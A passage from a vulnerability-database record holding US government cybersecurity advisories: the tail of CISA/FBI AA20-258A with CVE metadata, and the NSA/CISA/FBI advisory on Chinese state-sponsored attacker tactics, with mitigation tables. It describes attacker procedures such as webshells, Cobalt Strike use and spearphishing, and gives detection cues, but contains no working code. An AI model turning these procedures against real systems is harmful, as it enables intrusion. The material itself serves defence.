5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. 
Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:22:14", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. 
These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. 
These actors make an effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities.** Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies.** Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. 
A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently.** Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note:** for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. 
SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity.** Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>) for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. 
Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. 
\u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note:** D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table I: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. 
\n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view make mitigation difficult. 
Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. 
If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. 
\n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. 
\nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. 
For more information refer to NSA Cybersecurity Information Sheet: [Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>).\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. 
\nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`, `.vbs`).\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). 
Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. 
The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `aspx`, `php`, `jspx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis 
[[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). 
\n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and 
discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push PowerShell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. 
